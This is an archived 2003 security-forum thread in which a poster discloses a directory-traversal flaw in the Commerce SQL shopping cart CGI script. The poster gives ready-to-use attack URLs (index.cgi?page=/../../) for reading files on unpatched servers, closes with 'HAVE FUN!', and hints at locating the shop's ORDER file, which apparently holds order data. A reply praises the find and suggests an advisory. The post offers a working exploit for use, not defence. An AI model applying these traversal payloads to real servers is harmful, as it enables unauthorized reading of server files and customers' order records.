Commerce Sql Shopping Cart

Full Version: Commerce Sql Shopping Cart

GovernmentSecurity.org > The Archives > Exploit Articles

r00l

Sep 1 2003, 09:21 AM

HI!
Before 1 week i found a vulnerability in the commerce sql shopping cart.
You can use it for reading directories and files.

The problem is that the admin of the vulnerable server MUST set a permission on the directories and files,but he did not.
Sooo...the example looks like this:

www.server.com/cgi-bin/commerceSQL/index.cgi?page=/

if the server is vulnerable it will give you the file of the directory where the shopping cart is.

The next thing you should do is probably this :

www.server.com/cgi-bin/commerceSQL/index.cgi?page=/../

and then

www.server.com/cgi-bin/commerceSQL/index.cgi?page=/../../

etc...

You can reach alot of files

HAVE FUN!

P.S.
Don't ask where the ORDER file is.I won't tell you!But if you find it yourself I don't care.

-= Founded by r00l =-

woutiir

Sep 1 2003, 02:37 PM

Nice done mate, maybeyou can write an advisory about it

Thnx for sharing!

gr.
woutiir

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.